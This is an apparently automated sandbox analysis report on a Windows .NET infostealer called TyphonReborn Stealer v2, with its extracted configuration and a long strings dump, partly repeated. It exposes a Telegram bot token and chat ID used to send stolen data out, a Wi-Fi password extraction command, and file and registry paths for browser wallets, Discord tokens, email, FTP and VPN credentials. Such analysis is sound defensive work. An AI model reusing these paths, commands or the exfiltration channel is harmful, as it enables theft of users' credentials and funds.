File name:

b9_v2.bin

Full analysis: https://app.any.run/tasks/83723bd2-8b9e-4190-ba91-6c3ab28be5e2
Verdict: Malicious activity
Analysis date: June 28, 2023, 09:22:37
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
typhon
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5:

5966DE489C6A199737A4A93C65D61118

SHA1:

41235C1003F1D83F0D607D3FEDC7DF5E97F0709F

SHA256:

B9A0AB6783FC1E24B947C012DDE5DC639629EBF7845B0F1FB4045B721BE96565

SSDEEP:

49152:EUbowEOvygS7/1sHOqJ02nTPFdRPqxMaiYocdMvkKAG:EUcwti78OqJ7TPB7cavN

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • TYPHON detected by memory dumps

      • b9_v2.bin.exe (PID: 3004)

  • SUSPICIOUS

    • Reads the Internet Settings

      • b9_v2.bin.exe (PID: 3004)

  • INFO

    • The process checks LSA protection

      • b9_v2.bin.exe (PID: 3004)

    • Checks supported languages

      • b9_v2.bin.exe (PID: 3004)

    • Reads the computer name

      • b9_v2.bin.exe (PID: 3004)

    • Reads the machine GUID from the registry

      • b9_v2.bin.exe (PID: 3004)

    • [YARA] WLAN manipulation strings were found

      • b9_v2.bin.exe (PID: 3004)

    • Reads Environment values

      • b9_v2.bin.exe (PID: 3004)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Typhon

(PID) Process(3004) b9_v2.bin.exe
C2https://api.telegram.org/bot5803746145:AAF0CZTKujuHHwOJWU9jecx8hMRdsnNmFUk/getMe
Options
XORKeyJJW0V7PQ5B2B
Token5803746145:AAF0CZTKujuHHwOJWU9jecx8hMRdsnNmFUk
ChatID5136234727
Mutex6PF1YJ
BuildIDhttps://t.me/typhon_shop
GrabberSize5120
GrabberFileExtensions.txt|.rtf|.doc|.docx|.pdf|.xlsx|.xls|.ppt|.pptx|.accdb|.png|.jpeg|.jpg|.cs|.cpp|.p12
CryptoWallets1
FileGrabber1
Gaming1
FTP1
VPN1
IM1
Browser1
Screenshot1
AntiAnalysis1
AntiCIS0
BlacklistedCountriesUkraine|Russia|Netherlands
Strings (843)
false
true
\\
\"
\n
\r
\t
\b
\f
\u
X4
null
JSON Parse: Too many closing brackets
JSON Parse: Quotation marks seems to be messed up.
:
0
--debug
Detonate.exe
aJb|v|]&o*C&`k$dpI Tx|&pC)k-V^"Y&y
Manufacturer
microsoft corporation
Model
VIRTUAL
vmware
VirtualBox
W }O%sJfx#
a}t`||]&g(e`k$dpI Txo%aX/tw7W\L#9F|y
Name
VMware
T1
SbieDll.dll
SxIn.dll
Sf2.dll
snxhk.dll
cmdvrt32.dll
ollydbg.exe
processhacker.exe
tcpview.exe
autoruns.exe
de4dot.exe
ilspy.exe
dnspy.exe
autorunsc.exe
filemon.exe
procmon.exe
regmon.exe
idaq.exe
idaq64.exe
immunitydebugger.exe
wireshark.exe
dumpcap.exe
hookexplorer.exe
lordpe.exe
petools.exe
resourcehacker.exe
x32dbg.exe
x64dbg.exe
fiddler.exe
http://www.google.com
dnspy
detect it easy
die
procmon
process monitor
process hacker
ilspy
x64dbg
x86dbg
ghidra
ida
fiddler
scylla
winhex
hxd
de4dot
SELECT * FROM Win32_PortConnector
kernel32.dll
wine_get_unix_file_name
http://ip-api.com/line/?fields=hosting
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
dnSpy
Wireshark
HashCalc
FileInsight
PDFStreamDumper
Autoruns
Process Hacker
Process Monitor
Ghidra
kernelbase.dll
ntdll.dll
user32.dll
win32u.dll
IsDebuggerPresent
CheckRemoteDebuggerPresent
GetThreadContext
CloseHandle
OutputDebugStringA
GetTickCount
SetHandleInformation
NtQueryInformationProcess
NtSetInformationThread
NtClose
NtGetContextThread
NtQuerySystemInformation
FindWindowW
FindWindowA
FindWindowExW
FindWindowExA
GetForegroundWindow
GetWindowTextLengthA
GetWindowTextA
BlockInput
NtUserBlockInput
NtUserFindWindowEx
NtUserQueryWindow
NtUserGetForegroundWindow
detonate
virus
test
malware
maltest
vmware svga
SELECT ExecutablePath, ProcessID FROM Win32_Process
ProcessID
ExecutablePath
\Programs
Select ProcessorId From Win32_processor
ProcessorId
Unknown
4AB2DFCCF4
BFEBFBFF000906E9
078BFBFF000506E3
078BFBFF00000F61
178BFBFF00830F10
0F8BFBFF000306C1
IT-ADMIN
Paul Jones
WALKER
Sandbox
timmy
tim
vboxuser
sandbox
sand box
John Doe
Emily
CurrentUser
Abby
WDAGUtilityAccount
Frank
fred
JOHN-PC
.+
John
Peter Wilson
TVM
AM
AZE
AZ
RU
KZ
KAZ
UZ
UZB
KGZ
KG
MD
MDA
TM
TKM
TJK
TJ
BY
BLR
^3[47][0-9]{13}$
^(6541|6556)[0-9]{12}$
^389[0-9]{11}$
^3(?:0[0-5]|[68][0-9])[0-9]{11}$
6(?:011|5[0-9]{2})[0-9]{12}$
^63[7-9][0-9]{13}$
^(?:2131|1800|35\\d{3})\\d{11}$
^9[0-9]{15}$
^(6304|6706|6709|6771)[0-9]{12,15}$
^(5018|5020|5038|6304|6759|6761|6763)[0-9]{8,15}$
5[1-5][0-9]{14}$
^(6334|6767)[0-9]{12}|(6334|6767)[0-9]{14}|(6334|6767)[0-9]{15}$
^(4903|4905|4911|4936|6333|6759)[0-9]{12}|(4903|4905|4911|4936|6333|6759)[0-9]{14}|(4903|4905|4911|4936|6333|6759)[0-9]{15}|564182[0-9]{10}|564182[0-9]{12}|564182[0-9]{13}|633110[0-9]{10}|633110[0-9]{12}|633110[0-9]{13}$
^(62[0-9]{14,17})$
4[0-9]{12}(?:[0-9]{3})?$
^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$
3[47][0-9]{13}$
4MD9A52F5A2A5DB5D3F3E3D3D8A8DB3
JJW0V7PQ5B2B
0GM3a{(wr'rb &dsByA2b8Qr {7Z;PZ-[5eWh+=j
J]+{Q;=j
6PF1YJ
https://t.me/typhon_shop
5120
.txt|.rtf|.doc|.docx|.pdf|.xlsx|.xls|.ppt|.pptx|.accdb|.png|.jpeg|.jpg|.cs|.cpp|.p12
1
Ukraine|Russia|Netherlands
Crypto Wallets [BROWSER]
\Crypto Wallets [BROWSER]
Crypto Wallets [APP]
\Crypto Wallets [APP]
Software
-Qt
strDataDir
\wallets
Chrome_Binance
\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Chrome_Bitapp
\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Chrome_Coin98
\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Chrome_Equal
\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Chrome_Guild
\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Chrome_Iconex
\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfel
Chrome_Math
\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Chrome_Mobox
\Google\Chrome\User Data\Default\Local Extension Settings\fcckkdbjnoikooededlapcalpionmalo
Chrome_Phantom
\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Chrome_Tron
\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Chrome_XinPay
\Google\Chrome\User Data\Default\Local Extension Settings\bocpokimicclpaiekenaeelehdjllofo
Chrome_Ton
\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfnd
Chrome_Metamask
\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Chrome_Sollet
\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Chrome_Slope
\Google\Chrome\User Data\Default\Local Extension Settings\pocmplpaccanhmnllbbkpgfliimjljgo
Chrome_Starcoin
\Google\Chrome\User Data\Default\Local Extension Settings\mfhbebgoclkghebffdldpobeajmbecfk
Chrome_Swash
\Google\Chrome\User Data\Default\Local Extension Settings\cmndjbecilbocjfkibfbifhngkdmjgog
Chrome_Finnie
\Google\Chrome\User Data\Default\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj
Chrome_Keplr
\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Chrome_Crocobit
\Google\Chrome\User Data\Default\Local Extension Settings\pnlfjmlcjdjgkddecgincndfgegkecke
Chrome_Oxygen
\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh
Chrome_Nifty
\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Chrome_Liquality
\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Edge_Auvitas
\Microsoft\Edge\User Data\Default\Local Extension Settings\klfhbdnlcfcaccoakhceodhldjojboga
Edge_Math
\Microsoft\Edge\User Data\Default\Local Extension Settings\dfeccadlilpndjjohbjdblepmjeahlmm
Edge_Metamask
\Microsoft\Edge\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Edge_MTV
\Microsoft\Edge\User Data\Default\Local Extension Settings\oooiblbdpdlecigodndinbpfopomaegl
Edge_Rabet
\Microsoft\Edge\User Data\Default\Local Extension Settings\aanjhgiamnacdfnlfnmgehjikagdbafd
Edge_Ronin
\Microsoft\Edge\User Data\Default\Local Extension Settings\bblmcdckkhkhfhhpfcchlpalebmonecp
Edge_Yoroi
\Microsoft\Edge\User Data\Default\Local Extension Settings\akoiaibnepcedcplijmiamnaigbepmcb
Edge_Zilpay
\Microsoft\Edge\User Data\Default\Local Extension Settings\fbekallmnjoeggkefjkbebpineneilec
Edge_Exodus
\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold
Edge_Terra_Station
\Microsoft\Edge\User Data\Default\Local Extension Settings\ajkhoeiiokighlmdnlakpjfoobnjinie
Edge_Jaxx
\Microsoft\Edge\User Data\Default\Local Extension Settings\dmdimapfghaakeibppbfeokhgoikeoci
Zcash
\Zcash
Armory
\Armory
Bytecoin
\bytecoin
Jaxx
\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Exodus
\Exodus\exodus.wallet
Ethereum
\Ethereum\keystore
Electrum
\Electrum\wallets
AtomicWallet
\atomic\Local Storage\leveldb
Guarda
\Guarda\Local Storage\leveldb
Coinomi
\Coinomi\Coinomi\wallets
Litecoin
Dash
Bitcoin
\mozglue.dll
\nss3.dll
NSS_Init
PK11SDR_Decrypt
NSS_Shutdown
Failed to load NSS
oi_faggot_having_a_good_field_day_arent_you
DRIVE-
:
Grabber
Downloads
DropBox
OneDrive
TyphonReborn Stealer v2 by @lernaean_hydra0 & @StopDropNLoad
@
_
.zip
/c rmdir /S /Q "
"
cmd.exe
x
y
ProgramFiles
PROCESSOR_ARCHITEW6432
ProgramFiles(x86)
C:\Users\
\AppData\Roaming
Profiles
\logins.json
\key4.db
\places.sqlite
************************************************ * * * TyphonReborn Stealer v2 * * by @lernaean_hydra0 and @StopDropNLoad * * https://t.me/typhon_shop * ************************************************ ====...
[+] Machine name :
[+] Current date :
[+] Installed Languages :
[+] Current Language :
==================== SYSTEM DATA ==================== [+] Operating System :
[+] HWID :
[+] Installed Memory :
[+] Processor Name :
[+] Graphics Card Name :
[+] Battery status :
[+] Screen Metrics :
==================== NETWORK DATA ==================== [+] External IP :
[+] Internal IP :
[+] MAC Address :
[+] BSSID :
==================== LOCATION DATA ==================== [+] IP Based location: Country :
Region :
City :
ZIP code :
[+] BSSID based location:
Saving User Data...
\UserData.txt
\BuildID.txt
Saved User Data.
Saving Installed Softwares...
\InstalledSoftwares.txt
Saved Installed Softwares.
Saving system Info...
Saved System info
Saving Mail Clients...
Completed.
Saving Messaging softwares...
Saving FTP clients...
Saved FTP clients.
Saving browser data...
Saved browser data.
Saving Crypto wallets...
Saved crypto wallets.
Saving VPN clients...
Saved VPN clients...
Starting File Grabber...
\File Grabber
Finished File Grabbing operation.
.bat
xcxxxhcxxp 6xx50xxxxxx0xx1
TaxxxxsxxxkxxxKilxlx /Fx x/IxM xx
Tixxxmxxeoxxxut /Tx x2xxx /Nxxxoxbxrexxxxakx
/C
table
(
UNIQUE
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
\
Archive saved at:
🐍 New TyphonReborn Stealer v2 log! ---------- User Details ---------- User Name -
Machine Name -
Current Date -
Current Language -
---------- System info ---------- Operating System -
HWID -
Processor -
Graphics Card -
Battery Status -
RAM -
Screen Metrics -
---------- Network info ---------- External IP -
Internal IP -
BSSID -
MAC -
---------- Geo-Location data ---------- Country -
City -
Region -
ZIP code -
BSSID-based location -
---------- Statistics ----------
Cookies - {0}
Credit Cards - {0}
Passwords - {0}
Autofills - {0}
Crypto wallets - {0}
FTP Clients - {0}
VPN Clients - {0}
---------- //// \\\\ ---------- Build ID:
TyphonReborn Stealer v2 by @lernaean_hydra0 and @StopDropNLoad Archive status: Uploading to Telegram...
Sent log.
Document
Deleted archive
Error on client!!!
https://api.telegram.org/bot
/sendMessage?chat_id=
&text=
⛔ File not found!
/send
?chat_id=
NordVPN
NordVpn.exe*
user.config
//setting[@name='Username']/value
//setting[@name='Password']/value
\Accounts.txt
Username:
Password:
=======================
OpenVPN Connect\profiles
\profiles
ovpn
profiles\
ProtonVPN
ProtonVPN.exe
\user.config
VPN Clients
\NordVPN
\OpenVPN
\ProtonVPN
================ Drive name : {0} Drive type : {1} Total drive size : {2} GB Is drive ready : {3} Drive format : {4} ================
Drive Info.txt
root\CIMV2
SELECT * FROM Win32_Processor
Select * From Win32_ComputerSystem
TotalPhysicalMemory
MB
-1
SELECT * FROM Win32_VideoController
, (
%)
\Running Processes.txt
Process name:
PID:
Executable Path:
=================
Screenshot
_dd.MM.yyyy_HH.mm.ss
.jpeg
Screenshot.jpg
SELECT * FROM Win32_Product
>
,
.
Failed to get languages
HARDWARE\Description\System\CentralProcessor\0
Identifier
x86
x64
(Unknown)
Unknown System
SELECT * FROM win32_operatingsystem
No network adapters with an IPv4 address in the system!
http://api.ipify.org
Request failed
unknown
x2
Failed
https://api.mylnikov.org/geolocation/wifi?v=1.1&data=open&bssid=
{"result":200
"lat":
,
"lon":
"range":
Latitude:
Longitude:
Range:
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Not installed
N/A
country_name
country_code
region
r+r
postal
Not specified
axxHR0xxcHM6xxxxLy9pxcxGFxwxaS5jbxxxxxy8=
/json
ipapi.co/#c-sharp-v1.03
dd.MM.yyyy HH:mm:ss
/C chcp 65001 && netsh wlan show profile | findstr All
/C timeout /t 5 /nobreak > nul && netsh wlan show profile name="
" key=clear | findstr Key
/C timeout /t 5 /nobreak > nul && netsh wlan show networks mode=bssid
\Available Networks.txt
65001
Wifi name:
\Wifi Passwords.txt
{0} TRUE {1} FALSE {2} {3} {4}
Name: {0} Value: {1} Application: {2} Stealer: TyphonReborn Stealer v2 ==========================
email
e-mail
phone
name
username
usrname
register
login
bank
password
address
creditcard
checkout
dob
pin
zip
paypal
crypto
registration
customer
auth
key
Name: {0} Value: {1} Stealer: TyphonReborn Stealer v2 ==========================
Type: {0} Number: {1} Expiry: {2} Holder: {3} Stealer: TyphonReborn Stealer
/
URL: {0} Username: {1} Password: {2} Browser: {3} Stealer: TyphonReborn Stealer v2 ==========================
[\w-]{24}\.[\w-]{6}\.[\w-]{27}
mfa\.[\w-]{84}
(dQw4w9WgXcQ:)([^.*\['(.*)'\].*$][^"]*)
\discord\Local Storage\leveldb\
*.ldb
dQw4w9WgXcQ:
\Tokens.txt
os_crypt
encrypted_key
\discord\Local State
IM Clients
Discord
Telegram
Pidgin
ICQ
Signal
Skype
Tox
0001
\0001
Protocol:
Login:
Password:
\Pidgin Accounts.txt
.purple\accounts.xml
databases
Session Storage
Local Storage
sql
\databases
\Session Storage
\Local Storage
\sql
\config.json
Microsoft\Skype for Desktop
\Telegram Desktop\tdata
tdata
s
usertag
settings
key_data
tox
E-Mail Clients
Outlook
Thundirbird
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
SMTP Email Address
SMTP Server
POP3 Server
POP3 User Name
SMTP User Name
NNTP Email Address
NNTP User Name
NNTP Server
IMAP Server
IMAP User Name
Email
HTTP User
HTTP Server URL
POP3 User
IMAP User
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTPMail Password
SMTP Password
\Outlook.txt
Password
2
:
{0}: {1}
^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$
^(?!:\/\/)([a-zA-Z0-9-_]+\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}?$
\Passwords.txt
\Cookies
\Cookies_("Thunderbird").txt
cookies.sqlite
moz_cookies
host
isSecure
path
expires_utc
value
Failed to copy files to decrypt passwords
logins.json
,"logins":\[
,"potentiallyVulnerablePasswords"
},
Failed to set profile!
hostname
encryptedUsername
encryptedPassword
Thunderbird Mail Client
key3.db
key4.db
cert9.db
Gaming Clients
\UPlay
\Stem
\Steam
\Minecraft
versions
bytes
yyyy-MM-dd h:mm:ss tt
\versions.txt
VERSION:
SIZE:
DATE:
mods
\Installed Mods.txt
Mod:
Size:
Date of creation:
screenshots
\Screenshots
\Screenshots\
profile
options
servers
logs
.minecraft
Software\\Valve\\Steam
SteamPath
Apps
Apps\
Installed
No
Yes
Running
Updating
\Apps.txt
Application
GameID:
Installed:
Running:
Updating:
\ssnf
ssfn
\ssnf\
config
\configs
vdf
\configs\
Autologin User:
AutoLoginUser
Remember password:
\SteamInfo.txt
Ubisoft Game Launcher
\FileZilla\
recentservers.xml
sitemanager.xml
Server
Pass
ftp://
Host
Port
URL:
Username:
=====================
\Hosts.txt
FTP Clients
FileZilla
WinSCP
\Logins.txt
URL:
UserName:
Password:
==========================
Software\Martin Prikryl\WinSCP 2\Sessions
HostName
UserName
PortNumber
A
10
B
11
C
12
D
13
E
14
F
15
ABCDEF
l O#V5oZuzEv\&^}Gn9n'peMk)QuV
l}Nmx.||7o*k _ry
luQ"rJ*`r`po.Cv\&^}GnK }Ww-V[pj]y
l(@ b`6Q"c Y'Zvk[y|
l m%rt?mVQLuIk TD
l U#[`V, rVvLuIk TD
l Vb`0QJVvL v[!tP
l I%Xt5o^"c Y'Zvk[y|
l0O#bdvlJVvL v[!tP
lJb*W/`;|L&"IkP`T'+qqk)ms{
lN b!` x1Q)_!`p&^}' AeNp&guc|
l}#Bo`1l:c'^FuI`_uN|
lU#[x6V(p W) V>_$kF%`  }X) k1W_"V#ex^ M(PwKR y2ZTu en=a%YQ*B|
l Q%rt5T)gwC kP('U-NeNp&gud6
l O#V0W-JWv{&sPk _'Q}a\|
l <Ibx.WpJVvL v[!tP
l svpQx,mOkTtn6
l}@X^vQ"c Y'Zvk[y|
l O#b -WpJV)[&sPk _'Q}a\|
lM bV0md;oVk_&Zv`P
l O"X|)md;o Rte3
l (Q#X`*PJlw^k.p&^}' AeNp&gud6
l O#b -WpJVvL v[!tP
l px?WrV;oV] E! _'T9n'peMk)QuV
luQ$}`)Ws;mOkTtn6
l7Mbd5Ws"c Y'Zvk[y|
l N%m`3TF"`w tsC$<e' A a\)"
lqIZ?Ws-mOkTtn6
l O|0lpJV){'JuI`_uN|
l @b%c|-V-pk[ry
l V"X 2Ws`7mOkTtn6
luQ bE3`/d"dC&e>e&J }P uW
l@mh*`s ,Q &]'^P][ UL,yB)ww-V^>c"L g,Wu&
luIx0Vs ,Q:st"_uI`_u|
luO$X^5Wt"g).LdE ry
l Q%rd?o, u
l7Mbd5o 4
l V%b-ox(T^
l O#b -WpJ lvp'^]'p
l ,Nb|rVr`po.C'>w d_'UN!
lqpVcg&c_%tsE't}]%oByGw3fu
luO#,T^2od'^X!d %oxM'sKeA-|wwC#u
Opera Software
\Web Data
\Login Data
\Network\Cookies
\Local State
\Credit Cards
\Credit Cards\CreditCards_(
)_[
].txt
\Cookies\Cookies_(
\ImportantAutofills.txt
\Autofills
\Autofills\Autofills_(
logins
origin_url
username_value
password_value
credit_cards
name_on_card
expiration_month
expiration_year
cookies
host_key
httponly
secure
encrypted_value
autofill
Opera
Thunderbird
).txt
Firefox
Waterfox
K-Melon
IceDragon
Cyberfox
Blackhawk
Pale Moon
":"([^"]+)"
.compressed
bouncycastle.crypto
costura.bouncycastle.crypto.dll.compressed
costura
costura.costura.dll.compressed
costura.costura.pdb.compressed
dotnetzip
costura.dotnetzip.dll.compressed
costura.dotnetzip.pdb.compressed
system.runtime.interopservices.runtimeinformation
costura.system.runtime.interopservices.runtimeinformation.dll.compressed
No Malware configuration.

TRiD

.exe | Generic CIL Executable (.NET, Mono, etc.) (56.7)
.exe | Win64 Executable (generic) (21.3)
.scr | Windows screen saver (10.1)
.dll | Win32 Dynamic Link Library (generic) (5)
.exe | Win32 Executable (generic) (3.4)

EXIF

EXE

AssemblyVersion: 1.0.0.0
ProductVersion: 1.0.0.0
ProductName: Serpentine
OriginalFileName: Trio.exe
LegalTrademarks: -
LegalCopyright: Copyright © 2022
InternalName: Trio.exe
FileVersion: 1.0.0.0
FileDescription: Serpentine
CompanyName: -
Comments: -
CharacterSet: Unicode
LanguageCode: Neutral
FileSubtype: -
ObjectFileType: Executable application
FileOS: Win32
FileFlags: (none)
FileFlagsMask: 0x003f
ProductVersionNumber: 1.0.0.0
FileVersionNumber: 1.0.0.0
Subsystem: Windows GUI
SubsystemVersion: 6
ImageVersion: -
OSVersion: 4
EntryPoint: 0x20ec2e
UninitializedDataSize: -
InitializedDataSize: 2048
CodeSize: 2149888
LinkerVersion: 48
PEType: PE32
ImageFileCharacteristics: Executable, Large address aware, 32-bit
TimeStamp: 2040:01:09 07:56:28+00:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 09-Jan-2040 07:56:28
Comments: -
CompanyName: -
FileDescription: Serpentine
FileVersion: 1.0.0.0
InternalName: Trio.exe
LegalCopyright: Copyright © 2022
LegalTrademarks: -
OriginalFilename: Trio.exe
ProductName: Serpentine
ProductVersion: 1.0.0.0
Assembly Version: 1.0.0.0

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000080

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 3
Time date stamp: 09-Jan-2040 07:56:28
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LARGE_ADDRESS_AWARE

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00002000
0x0020CC34
0x0020CE00
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
7.9661
.rsrc
0x00210000
0x000005A4
0x00000600
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
4.04121
.reloc
0x00212000
0x0000000C
0x00000200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
0.10191

Resources

Title
Entropy
Size
Codepage
Language
Type
1
5.00112
490
UNKNOWN
UNKNOWN
RT_MANIFEST

Imports

mscoree.dll
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
1
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start THREAT b9_v2.bin.exe

Process information

PID
CMD
Path
Indicators
Parent process
3004"C:\Users\admin\Desktop\b9_v2.bin.exe" C:\Users\admin\Desktop\b9_v2.bin.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Serpentine
Exit code:
0
Version:
1.0.0.0
Modules
Images
c:\users\admin\desktop\b9_v2.bin.exe
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
Typhon
(PID) Process(3004) b9_v2.bin.exe
C2https://api.telegram.org/bot5803746145:AAF0CZTKujuHHwOJWU9jecx8hMRdsnNmFUk/getMe
Options
XORKeyJJW0V7PQ5B2B
Token5803746145:AAF0CZTKujuHHwOJWU9jecx8hMRdsnNmFUk
ChatID5136234727
Mutex6PF1YJ
BuildIDhttps://t.me/typhon_shop
GrabberSize5120
GrabberFileExtensions.txt|.rtf|.doc|.docx|.pdf|.xlsx|.xls|.ppt|.pptx|.accdb|.png|.jpeg|.jpg|.cs|.cpp|.p12
CryptoWallets1
FileGrabber1
Gaming1
FTP1
VPN1
IM1
Browser1
Screenshot1
AntiAnalysis1
AntiCIS0
BlacklistedCountriesUkraine|Russia|Netherlands
Strings (843)
false
true
\\
\"
\n
\r
\t
\b
\f
\u
X4
null
JSON Parse: Too many closing brackets
JSON Parse: Quotation marks seems to be messed up.
:
0
--debug
Detonate.exe
aJb|v|]&o*C&`k$dpI Tx|&pC)k-V^"Y&y
Manufacturer
microsoft corporation
Model
VIRTUAL
vmware
VirtualBox
W }O%sJfx#
a}t`||]&g(e`k$dpI Txo%aX/tw7W\L#9F|y
Name
VMware
T1
SbieDll.dll
SxIn.dll
Sf2.dll
snxhk.dll
cmdvrt32.dll
ollydbg.exe
processhacker.exe
tcpview.exe
autoruns.exe
de4dot.exe
ilspy.exe
dnspy.exe
autorunsc.exe
filemon.exe
procmon.exe
regmon.exe
idaq.exe
idaq64.exe
immunitydebugger.exe
wireshark.exe
dumpcap.exe
hookexplorer.exe
lordpe.exe
petools.exe
resourcehacker.exe
x32dbg.exe
x64dbg.exe
fiddler.exe
http://www.google.com
dnspy
detect it easy
die
procmon
process monitor
process hacker
ilspy
x64dbg
x86dbg
ghidra
ida
fiddler
scylla
winhex
hxd
de4dot
SELECT * FROM Win32_PortConnector
kernel32.dll
wine_get_unix_file_name
http://ip-api.com/line/?fields=hosting
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
dnSpy
Wireshark
HashCalc
FileInsight
PDFStreamDumper
Autoruns
Process Hacker
Process Monitor
Ghidra
kernelbase.dll
ntdll.dll
user32.dll
win32u.dll
IsDebuggerPresent
CheckRemoteDebuggerPresent
GetThreadContext
CloseHandle
OutputDebugStringA
GetTickCount
SetHandleInformation
NtQueryInformationProcess
NtSetInformationThread
NtClose
NtGetContextThread
NtQuerySystemInformation
FindWindowW
FindWindowA
FindWindowExW
FindWindowExA
GetForegroundWindow
GetWindowTextLengthA
GetWindowTextA
BlockInput
NtUserBlockInput
NtUserFindWindowEx
NtUserQueryWindow
NtUserGetForegroundWindow
detonate
virus
test
malware
maltest
vmware svga
SELECT ExecutablePath, ProcessID FROM Win32_Process
ProcessID
ExecutablePath
\Programs
Select ProcessorId From Win32_processor
ProcessorId
Unknown
4AB2DFCCF4
BFEBFBFF000906E9
078BFBFF000506E3
078BFBFF00000F61
178BFBFF00830F10
0F8BFBFF000306C1
IT-ADMIN
Paul Jones
WALKER
Sandbox
timmy
tim
vboxuser
sandbox
sand box
John Doe
Emily
CurrentUser
Abby
WDAGUtilityAccount
Frank
fred
JOHN-PC
.+
John
Peter Wilson
TVM
AM
AZE
AZ
RU
KZ
KAZ
UZ
UZB
KGZ
KG
MD
MDA
TM
TKM
TJK
TJ
BY
BLR
^3[47][0-9]{13}$
^(6541|6556)[0-9]{12}$
^389[0-9]{11}$
^3(?:0[0-5]|[68][0-9])[0-9]{11}$
6(?:011|5[0-9]{2})[0-9]{12}$
^63[7-9][0-9]{13}$
^(?:2131|1800|35\\d{3})\\d{11}$
^9[0-9]{15}$
^(6304|6706|6709|6771)[0-9]{12,15}$
^(5018|5020|5038|6304|6759|6761|6763)[0-9]{8,15}$
5[1-5][0-9]{14}$
^(6334|6767)[0-9]{12}|(6334|6767)[0-9]{14}|(6334|6767)[0-9]{15}$
